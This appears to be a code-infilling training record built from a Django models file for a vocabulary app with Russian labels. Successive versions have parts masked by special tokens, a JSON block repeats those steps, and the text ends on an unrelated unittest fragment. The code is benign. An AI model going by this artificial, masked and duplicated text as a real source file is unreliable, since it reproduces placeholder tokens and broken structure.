verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
verbose_name='forvo id препочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Word(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
ordering = ['value']
verbose_name = 'Слово'
verbose_name_plural = 'Слова'
class Meaning(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
value = models.TextField(verbose_name='Значение')
order = models.PositiveIntegerField(verbose_name='Порядок', default=0)
examples = JSONField(null=True, blank=True)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
verbose_name='forvo id препочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Word(models.Model):
value = models.CharField(max_length=50, verbose_name='Слово')
spelling = models.CharField(max_length=250, verbose_name='Транскрипция')
raw_od_article = JSONField(verbose_name='Сырые данные с OD')
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return self.value
class Meta:
ordering = ['value']
verbose_name = 'Слово'
verbose_name_plural = 'Слова'
class Meaning(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
value = models.TextField(verbose_name='Значение')
order = models.PositiveIntegerField(verbose_name='Порядок', default=0)
examples = JSONField(null=True, blank=True)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ['order']
verbose_name = 'Доп. значение'
verbose_name_plural = 'Доп. значения'
class Pronunciation(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
audio = models.FileField(upload_to='media/audio', verbose_name=
'Произношение')
raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,
null=True)
is_active = models.BooleanField(default=True, verbose_name='Используется')
def __str__(self):
return 'Произношение {}'.format(self.word)
class Meta:
verbose_name = 'Произношение'
verbose_name_plural = 'Произношения'
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=
'Слово')
user = models.ForeignKey('auth.User', on_delete=models.CASCADE,
verbose_name='Пользователь')
is_user_know_meaning = models.BooleanField(default=False, verbose_name=
'Выучил значение')
is_user_know_pronunciation = models.BooleanField(default=False,
verbose_name='Выучил произношение')
usage_count = models.PositiveIntegerField(default=0, verbose_name=
'Количество показов')
last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=
'Дата последнего показа')
preferred_pronunciation = models.PositiveIntegerField(default=0,
verbose_name='forvo id препочтительного произношения')
training_session = models.BooleanField(default=False, blank=False,
verbose_name='Сеанс обучения')
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',
'{}.json'.format(word_str))
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',
word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',
word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in (forvo_meta.get('items') or []):
if item.get('code', '') != 'en' or item.get('country', ''
) != 'United States':
continue
if ct > slen - 1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({'id': item['id'], 'by': item['username'], 'sex':
item['sex'], 'src': sound_file, 'best': is_best})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return 'Статистика слова {}'.format(self.word)
class Meta:
verbose_name = 'Статистика'
verbose_name_plural = 'Статистика'
<|reserved_special_token_1|>
import json
import os
from django.conf import settings
from django.db import models
from jsonfield import JSONField
class Word(models.Model):
value = models.CharField(
max_length=50,
verbose_name='Слово'
)
spelling = models.CharField(
max_length=250,
verbose_name='Транскрипция'
)
raw_od_article = JSONField(
verbose_name='Сырые данные с OD'
)
is_active = models.BooleanField(
default=True,
verbose_name='Используется'
)
def __str__(self):
return self.value
class Meta:
ordering = ["value"]
verbose_name = "Слово"
verbose_name_plural = "Слова"
class Meaning(models.Model):
word = models.ForeignKey(
Word,
on_delete=models.CASCADE,
verbose_name='Слово'
)
value = models.TextField(
verbose_name='Значение'
)
order = models.PositiveIntegerField(
verbose_name="Порядок",
default=0
)
examples = JSONField(
null=True,
blank=True
)
def __str__(self):
if self.value is None:
return ''
return self.value[:20]
class Meta:
ordering = ["order"]
verbose_name = "Доп. значение"
verbose_name_plural = "Доп. значения"
class Pronunciation(models.Model):
word = models.ForeignKey(
Word,
on_delete=models.CASCADE,
verbose_name='Слово'
)
audio = models.FileField(
upload_to='media/audio',
verbose_name='Произношение'
)
raw_od_data = JSONField(
verbose_name='Сырые данные с OD',
blank=True,
null=True
)
is_active = models.BooleanField(
default=True,
verbose_name='Используется'
)
def __str__(self):
return "Произношение {}".format(self.word)
class Meta:
verbose_name = "Произношение"
verbose_name_plural = "Произношения"
class PronunciationMeta(object):
def __init__(self, **kwargs):
for k, v in kwargs.items():
setattr(self, k, v)
class WordLearningState(models.Model):
word = models.ForeignKey(
Word,
on_delete=models.CASCADE,
verbose_name='Слово'
)
user = models.ForeignKey(
"auth.User",
on_delete=models.CASCADE,
verbose_name='Пользователь'
)
is_user_know_meaning = models.BooleanField(
default=False,
verbose_name='Выучил значение'
)
is_user_know_pronunciation = models.BooleanField(
default=False,
verbose_name='Выучил произношение'
)
usage_count = models.PositiveIntegerField(
default=0,
verbose_name='Количество показов'
)
last_usage_date = models.DateTimeField(
auto_now_add=True,
verbose_name='Дата последнего показа'
)
preferred_pronunciation = models.PositiveIntegerField(
default=0,
verbose_name='forvo id препочтительного произношения',
)
training_session = models.BooleanField(
default=False,
blank=False,
verbose_name='Сеанс обучения'
)
def _get_pronunciations_meta(self, word_str):
forvo_meta_path = os.path.join(
settings.BASE_DIR, 'media', 'forvo', '{}.json'.format(word_str)
)
if not os.path.exists(forvo_meta_path):
return
with open(forvo_meta_path, 'r') as f:
data = json.load(f)
return data
def _get_sounds(self, word_str):
ret = []
sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds', word_str)
print(sounds_path)
if not os.path.exists(sounds_path):
return []
items = list(os.listdir(sounds_path))
items.sort()
for item in items:
if item.endswith('.mp3'):
ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds', word_str, item))
return ret
def get_pronunciations(self):
word = self.word
forvo_meta = self._get_pronunciations_meta(word.value)
if not forvo_meta:
return []
ret = []
ct = 0
sounds = self._get_sounds(word.value)
slen = len(sounds)
prefered_detected = False
for item in forvo_meta.get('items') or []:
if item.get('code', '') != 'en' or item.get(
'country', '') != 'United States':
continue
if ct > slen-1:
break
sound_file = sounds[ct]
is_best = self.preferred_pronunciation == item['id']
if is_best:
prefered_detected = True
ret.append({
'id': item['id'],
'by': item['username'],
'sex': item['sex'],
'src': sound_file,
'best': is_best
})
ct += 1
if ct == 4:
break
if ret and not prefered_detected:
ret[0]['best'] = True
return ret
def __str__(self):
return "Статистика слова {}".format(self.word)
class Meta:
verbose_name = "Статистика"
verbose_name_plural = "Статистика"
|
flexible
|
{
"blob_id": "067e0129b1a9084bbcee28d1973504299b89afdb",
"index": 8911,
"step-1": "<mask token>\n\n\nclass Meaning(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-2": "<mask token>\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n value = models.TextField(verbose_name='Значение')\n order = models.PositiveIntegerField(verbose_name='Порядок', default=0)\n examples = JSONField(null=True, blank=True)\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-3": "<mask token>\n\n\nclass Word(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n ordering = ['value']\n verbose_name = 'Слово'\n verbose_name_plural = 'Слова'\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n value = models.TextField(verbose_name='Значение')\n order = models.PositiveIntegerField(verbose_name='Порядок', default=0)\n examples = JSONField(null=True, blank=True)\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-4": "<mask token>\n\n\nclass Word(models.Model):\n value = models.CharField(max_length=50, verbose_name='Слово')\n spelling = models.CharField(max_length=250, verbose_name='Транскрипция')\n raw_od_article = JSONField(verbose_name='Сырые данные с OD')\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return self.value\n\n\n class Meta:\n ordering = ['value']\n verbose_name = 'Слово'\n verbose_name_plural = 'Слова'\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n value = models.TextField(verbose_name='Значение')\n order = models.PositiveIntegerField(verbose_name='Порядок', default=0)\n examples = JSONField(null=True, blank=True)\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n\n class Meta:\n ordering = ['order']\n verbose_name = 'Доп. значение'\n verbose_name_plural = 'Доп. значения'\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n audio = models.FileField(upload_to='media/audio', verbose_name=\n 'Произношение')\n raw_od_data = JSONField(verbose_name='Сырые данные с OD', blank=True,\n null=True)\n is_active = models.BooleanField(default=True, verbose_name='Используется')\n\n def __str__(self):\n return 'Произношение {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Произношение'\n verbose_name_plural = 'Произношения'\n\n\nclass PronunciationMeta(object):\n\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(Word, on_delete=models.CASCADE, verbose_name=\n 'Слово')\n user = models.ForeignKey('auth.User', on_delete=models.CASCADE,\n verbose_name='Пользователь')\n is_user_know_meaning = models.BooleanField(default=False, verbose_name=\n 'Выучил значение')\n is_user_know_pronunciation = models.BooleanField(default=False,\n verbose_name='Выучил произношение')\n usage_count = models.PositiveIntegerField(default=0, verbose_name=\n 'Количество показов')\n last_usage_date = models.DateTimeField(auto_now_add=True, verbose_name=\n 'Дата последнего показа')\n preferred_pronunciation = models.PositiveIntegerField(default=0,\n verbose_name='forvo id препочтительного произношения')\n training_session = models.BooleanField(default=False, blank=False,\n verbose_name='Сеанс обучения')\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(settings.BASE_DIR, 'media', 'forvo',\n '{}.json'.format(word_str))\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds',\n word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds',\n word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in (forvo_meta.get('items') or []):\n if item.get('code', '') != 'en' or item.get('country', ''\n ) != 'United States':\n continue\n if ct > slen - 1:\n break\n sound_file = sounds[ct]\n is_best = self.preferred_pronunciation == item['id']\n if is_best:\n prefered_detected = True\n ret.append({'id': item['id'], 'by': item['username'], 'sex':\n item['sex'], 'src': sound_file, 'best': is_best})\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return 'Статистика слова {}'.format(self.word)\n\n\n class Meta:\n verbose_name = 'Статистика'\n verbose_name_plural = 'Статистика'\n",
"step-5": "import json\nimport os\n\nfrom django.conf import settings\nfrom django.db import models\nfrom jsonfield import JSONField\n\n\nclass Word(models.Model):\n value = models.CharField(\n max_length=50,\n verbose_name='Слово'\n )\n spelling = models.CharField(\n max_length=250,\n verbose_name='Транскрипция'\n )\n raw_od_article = JSONField(\n verbose_name='Сырые данные с OD'\n )\n\n is_active = models.BooleanField(\n default=True,\n verbose_name='Используется'\n )\n\n def __str__(self):\n return self.value\n\n class Meta:\n ordering = [\"value\"]\n verbose_name = \"Слово\"\n verbose_name_plural = \"Слова\"\n\n\nclass Meaning(models.Model):\n word = models.ForeignKey(\n Word,\n on_delete=models.CASCADE,\n verbose_name='Слово'\n )\n value = models.TextField(\n verbose_name='Значение'\n )\n order = models.PositiveIntegerField(\n verbose_name=\"Порядок\",\n default=0\n )\n examples = JSONField(\n null=True,\n blank=True\n )\n\n def __str__(self):\n if self.value is None:\n return ''\n return self.value[:20]\n\n class Meta:\n ordering = [\"order\"]\n verbose_name = \"Доп. значение\"\n verbose_name_plural = \"Доп. значения\"\n\n\nclass Pronunciation(models.Model):\n word = models.ForeignKey(\n Word,\n on_delete=models.CASCADE,\n verbose_name='Слово'\n )\n audio = models.FileField(\n upload_to='media/audio',\n verbose_name='Произношение'\n )\n raw_od_data = JSONField(\n verbose_name='Сырые данные с OD',\n blank=True,\n null=True\n )\n is_active = models.BooleanField(\n default=True,\n verbose_name='Используется'\n )\n\n def __str__(self):\n return \"Произношение {}\".format(self.word)\n\n class Meta:\n verbose_name = \"Произношение\"\n verbose_name_plural = \"Произношения\"\n\n\nclass PronunciationMeta(object):\n def __init__(self, **kwargs):\n for k, v in kwargs.items():\n setattr(self, k, v)\n\nclass WordLearningState(models.Model):\n word = models.ForeignKey(\n Word,\n on_delete=models.CASCADE,\n verbose_name='Слово'\n )\n user = models.ForeignKey(\n \"auth.User\",\n on_delete=models.CASCADE,\n verbose_name='Пользователь'\n )\n is_user_know_meaning = models.BooleanField(\n default=False,\n verbose_name='Выучил значение'\n )\n is_user_know_pronunciation = models.BooleanField(\n default=False,\n verbose_name='Выучил произношение'\n )\n usage_count = models.PositiveIntegerField(\n default=0,\n verbose_name='Количество показов'\n )\n last_usage_date = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Дата последнего показа'\n )\n preferred_pronunciation = models.PositiveIntegerField(\n default=0,\n verbose_name='forvo id препочтительного произношения',\n )\n training_session = models.BooleanField(\n default=False,\n blank=False,\n verbose_name='Сеанс обучения'\n )\n\n def _get_pronunciations_meta(self, word_str):\n forvo_meta_path = os.path.join(\n settings.BASE_DIR, 'media', 'forvo', '{}.json'.format(word_str)\n )\n if not os.path.exists(forvo_meta_path):\n return\n with open(forvo_meta_path, 'r') as f:\n data = json.load(f)\n return data\n\n def _get_sounds(self, word_str):\n ret = []\n sounds_path = os.path.join(settings.BASE_DIR, 'media', 'sounds', word_str)\n print(sounds_path)\n if not os.path.exists(sounds_path):\n return []\n items = list(os.listdir(sounds_path))\n items.sort()\n for item in items:\n if item.endswith('.mp3'):\n ret.append('{}{}/{}/{}'.format(settings.MEDIA_URL, 'sounds', word_str, item))\n return ret\n\n def get_pronunciations(self):\n word = self.word\n forvo_meta = self._get_pronunciations_meta(word.value)\n if not forvo_meta:\n return []\n\n ret = []\n ct = 0\n sounds = self._get_sounds(word.value)\n slen = len(sounds)\n prefered_detected = False\n for item in forvo_meta.get('items') or []:\n\n if item.get('code', '') != 'en' or item.get(\n 'country', '') != 'United States':\n continue\n\n if ct > slen-1:\n break\n\n sound_file = sounds[ct]\n\n is_best = self.preferred_pronunciation == item['id']\n\n if is_best:\n prefered_detected = True\n\n ret.append({\n 'id': item['id'],\n 'by': item['username'],\n 'sex': item['sex'],\n 'src': sound_file,\n 'best': is_best\n })\n\n ct += 1\n if ct == 4:\n break\n if ret and not prefered_detected:\n ret[0]['best'] = True\n return ret\n\n def __str__(self):\n return \"Статистика слова {}\".format(self.word)\n\n class Meta:\n verbose_name = \"Статистика\"\n verbose_name_plural = \"Статистика\"\n",
"step-ids": [
13,
14,
15,
17,
19
]
}
|
[
13,
14,
15,
17,
19
] |
import unittest
from Spreadsheet.HTML import Table
class TestColGroup(unittest.TestCase):
